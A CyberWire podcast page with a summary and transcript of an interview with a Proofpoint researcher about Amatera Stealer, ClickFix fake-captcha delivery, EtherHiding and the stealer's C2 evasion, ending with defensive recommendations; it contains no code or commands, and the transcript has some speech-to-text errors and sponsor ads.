Click here to steal. [Research Saturday] - CyberWire Daily

Summary5 min read

CyberWire Daily – Episode: "Click Here to Steal" [Research Saturday] Release Date: July 12, 2025
Host: N2K Networks

Introduction

In this episode of CyberWire Daily's Research Saturday, host Dave Bittner engages in an in-depth discussion with Selina Larson, a threat researcher and lead for intelligence analysis and strategy at Proofpoint. The conversation centers around the evolving landscape of information stealer malware, with a particular focus on the emergence of Amatera Stealer, its rebranding from ACR Stealer, and the sophisticated techniques employed by cybercriminals to evade detection.

Amatera Stealer: Evolution and Rebranding

Timestamp: [02:26]

Selina Larson introduces Amatera Stealer, a malware that originated as a rebranded version of ACR Stealer. She emphasizes the significance of this transformation:

"The stealer landscape right now is so dynamic... this was an interesting sort of little deep dive that we were able to see about this pretty interesting information stealer."
— Selina Larson [02:26]

Key Points:

Code Overlap: Amatera Stealer shares significant portions of its code with ACR Stealer, indicating a direct lineage.
Malware as a Service (MaaS): Amatera is marketed as a MaaS platform, similar to Luma, which was a prominent player before its disruption.
Enhanced Features: The malware boasts improved anti-analysis capabilities, sophisticated command and control (C2) operations, and a structured tier system for users.

Distribution Techniques: Clear Fake Campaigns and Click Fix

Timestamp: [06:08]

The discussion shifts to the distribution methods used by Amatera Stealer, highlighting the prevalence of clear fake campaigns and the click fix technique.

"Click fix is basically copying, pasting and running PowerShell. And this is something that we've seen from just tons of actors. It's completely overtaken the landscape."
— Selina Larson [07:11]

Clear Fake Campaigns:

Web Injects: Malware is delivered through compromised legitimate websites.
Fake Captchas: Users are prompted to complete verification steps that actually execute malicious PowerShell commands.

Click Fix Technique:

Social Engineering: Users are tricked into copying and pasting commands into PowerShell, leading to malware execution.
Ubiquity: This method is widespread across various threat actors and scenarios, making it a dominant vector in current cyber threats.

Advanced Evasion Techniques: Ether Hiding

Timestamp: [10:55]

Selina introduces Ether Hiding, an advanced technique used in conjunction with clear fake campaigns to enhance malware evasion.

"Ether hiding uses a Binance smart contract that has JavaScript stored within, which generates the captcha and the malicious command on the host."
— Selina Larson [11:02]

Mechanism:

Smart Contracts: JavaScript is embedded within a Binance smart contract to dynamically generate malicious commands.
Flexibility: Allows threat actors to update commands without altering the primary inject, enhancing persistence and adaptability.

Amatera Stealer’s Capabilities and Command & Control (C2) Infrastructure

Timestamp: [15:17]

The conversation delves into the operational aspects of Amatera Stealer, outlining its data exfiltration goals and C2 communications.

"Amatera Stealer is capable of running secondary payloads, downloading and executing executables or PowerShell commands."
— Selina Larson [15:17]

Data Targets:

Credentials: Passwords, crypto wallets.
Sensitive Information: Files on disks, browser cookies, web forms.

C2 Strategies:

Stealth Communication: Utilizes NTSockets over traditional HTTP requests to bypass standard detection.
CDN Utilization: Employs public CDN services like Cloudflare for C2, complicating the blocking process due to the shared nature of CDN IPs.
No DNS Dependency: Eliminates DNS lookups, rendering DNS-based monitoring ineffective.

Market Impact and the Decline of Luma Stealer

Timestamp: [18:13]

The discussion assesses whether Amatera Stealer is poised to fill the void left by the disrupted Luma Stealer.

"The market is now a little bit more open for some of these people who are like, okay, do I not trust Luma Stealer anymore... What we're seeing with Amatera is it's under active development."
— Selina Larson [19:48]

Insights:

Opportunity Post-Luma Disruption: The takedown of Luma creates a gap that Amatera Stealer is well-positioned to exploit.
Active Development: Continuous updates and improvements make Amatera a robust alternative for cybercriminals.
Market Dynamics: Disruptions in one service often lead to the rise of others, emphasizing the need for constant vigilance.

Defensive Recommendations for Security Teams

Timestamp: [22:37]

Selina offers strategic advice for defenders to safeguard against threats like Amatera Stealer.

"Incorporate click fix technique into your existing security training and restrict users from running unauthorized PowerShell."
— Selina Larson [22:44]

Key Strategies:

Network Signatures:
- Implement and update network signatures to detect malicious C2 traffic and data exfiltration.
User Education:
- Train users to recognize and avoid social engineering tactics like click fix.
Restrict PowerShell Usage:
- Prevent unauthorized execution of PowerShell commands to mitigate self-execution of malware.
Control Downloads:
- Limit downloads from untrusted or newly registered domains.
- Ensure software downloads are vetted and authorized by IT departments.
Defense in Depth:
- Implement multiple layers of security to block malicious activities even if one layer is breached.

Conclusion

The episode underscores the dynamic and evolving nature of the information stealer ecosystem, with Amatera Stealer exemplifying the advanced tactics employed by cybercriminals to sustain and enhance their operations. Selina Larson’s insights provide a comprehensive overview of the current threats and actionable strategies for organizations to bolster their defenses against such sophisticated malware.

Notable Quotes:

Selina Larson [02:26]: "The stealer landscape right now is so dynamic... this was an interesting sort of little deep dive."
Selina Larson [07:11]: "Click fix is basically copying, pasting and running PowerShell. And this is something that we've seen from just tons of actors. It's completely overtaken the landscape."
Selina Larson [11:02]: "Ether hiding uses a Binance smart contract that has JavaScript stored within, which generates the captcha and the malicious command on the host."
Selina Larson [22:44]: "Incorporate click fix technique into your existing security training and restrict users from running unauthorized PowerShell."

Produced by: Liz Stokes
Mixed by: Elliot Keltzman and Trey Hester
Executive Producer: Jennifer Iban
Publisher: Peter Kilpe
Host: Dave Bittner

This summary provides a comprehensive overview of the "Click Here to Steal" episode, capturing the essential discussions and insights shared by Selina Larson on the evolving threats posed by Amatera Stealer and the strategies to combat them.

Loading summary

Transcript36 lines

[00:02]
Selina Larson
You're listening to the Cyberwire network, powered by N2K.
[00:13]
Dave Bittner
Hey everybody. Dave here. I've talked about Deleteme before and I'm still using it because it still works. It's been a few months now and I'm just as impressed today as I was when I signed up. Deleteme keeps finding and removing my personal information from data broker sites and and they keep me updated with detailed reports so I know exactly what's been taken down. I'm genuinely relieved. Knowing my privacy isn't something I have to worry about every day. The Deleteme team handles everything. It's the set it and forget it peace of mind. And it's not just for individuals. DeleteMe also offers solutions for businesses, helping companies protect their employees personal information and reduce exposure to social engineering and phishing threats. And right now, our listeners get a special 20% off your delete me plan. Just go to JoinDeleteMe.com N2K and use promo code N2K at checkout. That's JoinDeleteMe.com N2k code N2K.
[01:26]
Selina Larson
Foreign.
[01:32]
Dave Bittner
Hello everyone, and welcome to the Cyberwires Research Saturday. I'm Dave Bittner and this is our weekly conversation with researchers and analysts tracking down the threats and vulnerabilities, solving some of the hard problems, and protecting ourselves in our rapidly evolving cyberspace. Thanks for joining us.
[01:56]
Selina Larson
One of the main initial access vectors that we have been very closely tracking are web injects, which of course are injects on legitimate but compromised websites that have been observed delivering a variety of different malware. Many of those payloads do tend to be information stealers. And so in this case, we were able to see a malware that became known as Amatera Stealer, or that's what we later identified it as, being delivered via web injects.
[02:27]
Dave Bittner
That's Selina Larson, threat researcher and lead for intelligence analysis and strategy at proofpoint. The research we're discussing today is titled Amatera Stealer Rebranded ACR Stealer with Improved Evasion and Sophistication.
[02:50]
Selina Larson
We also saw a number of samples in open Source, like on VirusTotal. Some of our colleagues at other research teams also observed it in other tack chains. But what's really interesting to me is the fact that the Steeler landscape right now is so dynamic and this particular stealer is basically a rebranded stealer known as ACR Stealer. But it's got a lot of updates to it. And I think that one of the most important things from a cybercriminal perspective, especially now in the landscape are taking a look at information stealers, taking a look at this landscape, trying to figure out, you know, what are threat actors using, how are they developing workarounds for defense, what are the different delivery mechanisms that we're seeing a lot of. Because as we've talked about previously on various podcasts, Dave, the information stealer landscape right now is booming and that's where it's a very, very serious threat. And so, yeah, so this was, it was an interesting sort of little deep dive that we were able to see about this pretty interesting information steale.
[03:59]
Dave Bittner
So you mentioned ACR Stealer. What set Amatera Stealer apart, that it's not just a variant of acr, that it is its own unique thing.
[04:11]
Selina Larson
Yeah, so there are significant portions of code overlap that exist with ACR stealer analysis in the public. And so that's kind of where we're like, oh, is this just updated or acr? But it's really featured a full rebrand. So Amatera Steelers actually sold as a malware, as a service, which is what we see from a lot of these very prominent information stealers. Luma, for example, was pretty much the most popular malware as a service in terms of the information stealer ecosystem. And then it got disrupted. And so that's also. We can, we can, you know, talk about that as part of this conversation too. But that's, you know, why we're kind of keeping an eye on how the infrasteer landscape is moving. But what we did find was this particular malware had a bunch of new interesting anti analysis features. There was some improved sophistication of the malware. The command and control operates a lot differently. The actual where you can purchase it or manage it from, you know, the panel, we were able to get eyes on a panel, it's called Amatera Stealer. So you know, you can actually see like the payment structure and the tier structure. And what was interesting is that back in July of 2024, for the ACR support channel, which is of course on Telegram, as many of these things are, basically they said, you know, we're not going to sell ACR Stealer anymore. You know, we're closed for an indefinite period, but you know, there will be no problems. We do not say goodbye. This is of course all in Russian, but we included a machine translated version of that message. But so I said, okay, this is not goodbye. And so then come around December, towards the end, end of last year, this new ACR or new ACR Amatera Stealer sort of popped up. And the panel began surfacing. And so we were able to kind of see some of those overlaps in terms of the timeline of the stealer and the sort of the rebrand with a bunch of new features.
[06:08]
Dave Bittner
I see, so your belief is that this is the same group who created ACR Stealer. This is an updated version.
[06:17]
Selina Larson
Mm, okay. Yeah, got it.
[06:19]
Dave Bittner
Yeah. So the research talks about how Amatera is distributed via clear fake campaigns and also these click fix techniques. For anyone in our audience who might not be familiar with click fix, can you give us a quick description of how that works?
[06:36]
Selina Larson
Yeah, of course. And I do, you know, I have to say I recognize that it's very tough to keep a full understanding of the threat landscape. We're saying things like clear fake and click fix. And, you know, we talk about this technique called ether hiding and all these things. And certainly clear fake is just one of many types of web inject campaigns. So, you know, I just want to say that if you're not, if you're wondering what is clear fake, I've never heard of this before. You know what? That is totally fine.
[07:05]
Dave Bittner
Because don't, don't, don't let your imposter syndrome kick in. Because it's not you.
[07:12]
Selina Larson
No, it's the landscape. It's so crazy right now. Like, like the amount of web inject campaigns that we're seeing, many of which use the click fix technique, which I'll describe in just a second. So there's, there's so many out there. So, so, yeah, so. So click fix is actually a really interesting social engineering technique whereby threat actors will either through web injects or, you know, direct URLs or in some way essentially show you this dialogue that says you need to update for security purposes or, oh, you need to solve this captcha in actually access this content. And what that basically does is it tricks into copying, pasting and running PowerShell on their own host. So what we saw, for example, with this clear fake campaign, and again, clear fake is a type of web inject campaign that when they go to a website that's compromised by clear fake injects, they were presented with this fake captcha. So it says, complete these verification steps to prove you're not a robot. And then the instructions that it actually gives you are numbered 1, 2 and 3. One is press and hold the Windows key plus R. And then in the verification window, press Control V and then press Enter. So it's literally these, step by step, this is how to do this. But ultimately, what it is, you're running a Qlik Fix powershell command. So it's click fix. The technique is this click to fix, basically copying, pasting and running PowerShell. And this is something that we've seen from just tons of actors. It's completely overtaken the landscape.
[08:55]
Dave Bittner
Yeah, I mean it really seems like it is the flavor of the month right now, right?
[09:00]
Selina Larson
Oh absolutely, yeah. And we've even seen it with espionage threat actors using this sort of click fix technique. We see a lot of different sort of styles of the click fix technique. We see it with just of course, you know, update your Chrome browser. Of course we see it with that. We see the captcha prove you're not a robot. But we've even seen it with very specific and customized software that a specific target might be using for transportation and logistics, for instance. And it'll be like, oh, you have to update this very specific software. So threat actors are taking this idea of the click fix technique to copy, paste and run PowerShell on a host and just making it unique for whatever their purposes are. I think that that is one interesting part of this whole story actually. Is this, this click fix technique just one exploding all across the landscape where you have these web inject threat actors like Clearfake Land Update. A lot of the other threat actors that were trying zphp, a lot of these different clusters are using these sort of fake web inject style things. Compared with click fix, we see it with email threat actors as well, distributing URLs in ClickFix. It's just everywhere. It's like that meme. It's like click fix, click fix everywhere. Used to see it, the Toy Story meme. It's like it's everywhere.
[10:16]
Dave Bittner
Right. Which I, I, we assume means that they're seeing great success with it.
[10:22]
Selina Larson
That is how I am interpreting this. I mean, yeah, the thing is is typically when you see an explosion of a technique proliferate like this across the landscape, it tends to be very effective. I mean, you know, we're not going to see all of these actors using the same technique if it's not working, which is what actually kind of, you know, it kind of freaks me out. And they're well designed wars too. Like I have to say, like they're very like it's a believable captcha if you don't really know the steps that you're taking or whatever. It is pretty believable.
[10:55]
Dave Bittner
So earlier in our conversation you alluded to this technique called Ether hiding. Can you unpack that one for us?
[11:03]
Selina Larson
So Ether hiding is kind of Interesting. Basically it uses something called a binance smart contract that has this JavaScript is stored in that smart contract and then that is what will kind of generate the captcha and the malicious command on the actual host. And what the actor can do is modify the smart contract instead of the inject itself, basically. And it kind of has like, it's kind of complicated and it's really just like the clearflake cluster is one of the only ones that we see regularly kind of adopting this ether hiding technique. But it's essentially using the blockchain to store this command in a way that they can, you know, update that when they need to. And then oftentimes they might just leave it and not modify it at all. So it's kind of, yeah, it's basically you can block the domain on which the script is actually hosted, which is like the actual smart contract. And that is kind of what the, what the threat actor is using as opposed to, you know, injecting the JavaScript directly on the website, for example. There's a lot of different, a lot of different techniques that web inject threat actors use, and ether hiding is one of them that we see with clearfake.
[12:39]
Dave Bittner
We'll be right back. Compliance regulations, third party risk and customer security demands are all growing and changing fast. Is your manual GRC program actually slowing you down? If you're thinking there has to be something more efficient than spreadsheets, screenshots and all those manual processes, you're right. GRC can be so much easier and it can strengthen your security posture while actually driving revenue for your business. You know, one of the things I really like about Vanta is how it takes the heavy lifting out of your GRC program. Their trust management platform automates those key compliance, internal and third party risk, and even customer trust so you're not buried under spreadsheets and endless manual tasks. Vanta really streamlines the way you gather and manage information across your entire business. And this isn't just theoretical. A recent IDC analysis found that compliance teams using Vanta are 129% more productive. That's a pretty impressive number. So what does it mean for you? It means you get back more time and energy to focus on what actually matters, like strengthening your security posture and scaling your business. Vanta GRC. Just imagine how much easier trust can be. Visit vanta.com cyber to sign up today for a free demo. That's V-A-N-T a.com cyber and now a word from our sponsor, Cloudrange. At Cloudrange they believe cybersecurity readiness starts with people, not just technology. That's why their proactive simulation based training helps security teams build confidence and skill from day one by turning potential into performance. They empower SOC and incident response teams to respond quickly, smartly, and in sync with evolving threats. Learn how Cloudrange is helping organizations stay ahead of cyber risks@www.cloudrange.com. so what are Amatera's goals once it lands on a victim's machine? What sort of data is it looking to steal?
[15:17]
Selina Larson
Yeah, so as you might imagine, stealers nowadays just have a lot of different capabilities. Of course, you know, they're going after passwords, they're going after crypto wallets, stealing files on disks, browser cookies, web forms, things like that. And then of course you have Amatera Stealer that is also capable of running secondary payloads. So it could potentially download and execute files like executables, or you can Download and execute PowerShell. So it has both the stealing functionality as well as the ability to run follow on payloads.
[15:53]
Dave Bittner
Is the malware's configuration static or does it have the ability to dynamically adapt?
[16:00]
Selina Larson
So what's actually interesting is it used to use command and control using Steam or Telegram dead drops, which we see a lot of times with various dealers. We actually covered it before in one of our blog posts with VDAR Stealer, for example, where they will regularly use Steam or Telegram for command and control. But in this case they actually started using ntsockets for command and control. And so this kind of increases the stealthiness of the C2 communication. So the way that the command and control is set up, it kind of bypasses commonly used Windows Networking APIs, which a lot of times your endpoint detection analysis tool will rely on for visibility into the HTTP request. Another thing that's kind of interesting in terms of the malware capability is not using DNS, so it will use C2 via I. And the IP address in the cases that we were looking at was not owned by a threat actor, but was used using a CDN endpoint address. In this case it was Cloudflare. So yeah, so it has a little bit of interesting C2 communications that make it a little bit tricky. So for example, if they're using an IP address that's associated to a public CDN like Cloudflare, security operations might be reluctant to just block the IP address by default. Right. It's not like you can just block a C2 domain that we often see using like Malware command and Control for malware. But you know, with a. With an IP that belongs to this, like, public CDN that's probably used by a lot of different things, it might be like, okay, you know, we might not block this because it could be used by legitimate websites that are also using cdn. In addition to that, not using a domain name or DNS through for C2 also means that it can't be blocked or alerted on through DNS monitoring. So there's no DNS lookup for the domain name. So there's some of these other sort of like C2 functionalities that are trying to evade detection in a way that previous examples of similar malware you don't necessarily see.
[18:14]
Dave Bittner
Well, we mentioned Lumasteela earlier. When we're looking at the landscape here, lumasteeler was disrupted. Do we think that Amatera is stepping in to fill that gap?
[18:28]
Selina Larson
So I feel like it's a little bit early to say yes or no. But I do want to point out in terms of the actual pricing structure with Amatera and how, because these mas, which is such a funny word, malware as a service, MAS offerings, the way that they work, right, is that you pay to be able to access and use the information stealer. Lumo is very similar, and it's actually not too expensive. So, you know, for. For three months for 500 bucks, or like a full year for 1500 bucks. Like, this is what the pricing information for the publicly accessible panel we were able to see. And so, you know, I. I think that first of all, having a mass offering can sometimes lower the barrier to entry for a lot of cybercriminals. But also it does sort of enter the scene at this moment where people might be leaving lumasteeler. For a variety of reasons, Luma isn't fully eradicated. Right. Like, it was, a lot of the infrastructure was disrupted. It was obviously a big win for law enforcement and private sector. But we're still seeing some LUMA activity even after the takedown. Certainly not what it was. But what's great about a lot of these disruptions, in addition to actually disrupting infrastructure, doing takedowns, all of that stuff, is it really makes it so that the criminal who's operating this doesn't have the same sort of trust and brand recognition and, like, authority in the marketplace. Right? And so what you often see is when these things happen is you'll have the criminals who are using whatever the malware is go to greener pastures, so to speak. You know, maybe malware that isn't quite so under the microscope, maybe they Try and build their own thing. Maybe they stop doing crime, which is the, the ideal outcome.
[20:24]
Dave Bittner
Yeah. What an adorable thought.
[20:26]
Selina Larson
I know in a perfect world, if you're like, a criminal is doing crime and then the tool that they're using gets, like, it's like busted and targeted by law enforcement. Like, imagine if they decide to change their behavior and change their time for.
[20:41]
Dave Bittner
Me to step back and rethink my life.
[20:43]
Selina Larson
Right? Yeah. Like, oh, okay, maybe I can go in a different direction here. So, yeah, so I think, you know, the market is now, I think, a little bit more open for some of these people who are like, okay, do I not trust lumastealer anymore because it was a target of law enforcement disruption? Should I be spending money elsewhere? And, you know, if I was a malware author marketing my, you know, malware as a service, I'd be like, hey, I'm not that guy.
[21:12]
Dave Bittner
Right?
[21:12]
Selina Larson
Right. Yeah. Like, I don't have, you know, law enforcement breathing down my neck with all of these, you know, big blogs and, and reporting coming out about how I operate and all these things that have been taken down and, you know, made my life a little bit challenging. So. So yeah, I think it is an opportunity for, for cybercriminals to find, okay, what's next? But that's why it's so important to be, to really be sort of monitoring on top of the information stealer landscape. Because certainly LUMA was, was big and popular, but it's not the only one. And certainly what we're seeing, certainly with Amatera Stealer, for example, is it's under active development. So, you know, we're seeing them continuously modifying, updating, making changes to this malware to make it, from their perspective, better, more effective, more useful for the cybercriminal operators. And of course, you know, we wrote a bunch of detections for it, we have coverage for it, published some, some rules associated with it, but it's, it's, you know, it's very important to sort of stay on top of these things because they are under active development. And at any point something like the Luma disruption could happen and everyone flocks to something else. So I do think it's still too early to say for sure. Like, this is definitely replacing lumasealer, but, you know, having other options on the market and making sure that we have detections and defense against it is super important.
[22:37]
Dave Bittner
So what's your recommendation then for defenders? How should a security team go about protecting themselves against this?
[22:45]
Selina Larson
Yeah, so first of all, update. Make sure you have existing network signatures that will detect this traffic and the command and control, check in and exfiltration the traffic, things like that. There are rules that we published that are associated with this. One thing that I really, really want to make sure to hammer home is that people are aware and incorporate click fix technique into their existing security training. Making sure that people are aware of the new types of social engineering and techniques that are being used by threat actors is very, very important. Also restricting your average user from running unauthorized PowerShell is really important here because literally copy pasting, running PowerShell is like they're infecting themselves and making it so that end users can't do that is something that is very important. And yeah, I think those are kind of the two main things is to make sure that you're aware that this is happening and doing, you know, practicing defense in depth and making it so that users can't be running PowerShell. There are other ways that we've seen Amateria delivered as well. So you know, things like SEO poisoning, fake software downloads, things like that. So that's also very, very important. Restricting downloads from unknown domains, unrecognized domains really, you know, block traffic especially for from like newer just just registered domains, things like that are impersonating enterprise software, for example, and also not downloading unauthorized software. So oftentimes you'll see a lot of information stealers will be masquerading as for example a VPN app or a PDF reader or a document reader, things like that. And so you know, making, restricting those, the downloads from those types of tooling and only authorized, you know, like making sure if you need something like a PDF reader, go to your IT department and ask for that is I think important, important to note here as well. So user education I think is really important and really big. But also making sure that you as an organization have defense in depth and if a user does take an unsafe action, then they're blocked from the subsequent actions that could happen as a result of that activity.
[25:19]
Dave Bittner
Our thanks to Selina Larson from Proofpoint for joining us. The research is titled Amatera Steeler Rebranded ACR Stealer with Imperial Improved Evasion and Sophistication. We'll have a link in the show Notes. And that's Research Saturday brought to you by N2K CyberWire. We'd love to hear from you. We're conducting our annual survey to learn more about our listeners. We're collecting your insights through the end of this summer. There's a link in the show Notes. Please do check it out. This episode was produced by Liz Stokes. We're mixed by Elliot Keltzman and Trey Hester. Our executive producer is Jennifer Iban, Peter Kilpe is our publisher and I'm Dave Buettner. Thanks for listening. We'll see you back here next time. Krogle is AI built for the enterprise soc, fully private, schema free and capable of running in in sensitive air gapped environments. Krogle autonomously investigates thousands of alerts weekly, correlating insights across your tools without data leaving your perimeter. Designed for high availability across geographies, it delivers context aware, auditable decisions aligned to your workflows. Krogel empowers analysts to act faster and focus on critical threats, replacing repetitive triage with intelligent automation to help your sock operate at scale with precision and control. Learn more@krogle.com that's C-O GL.com.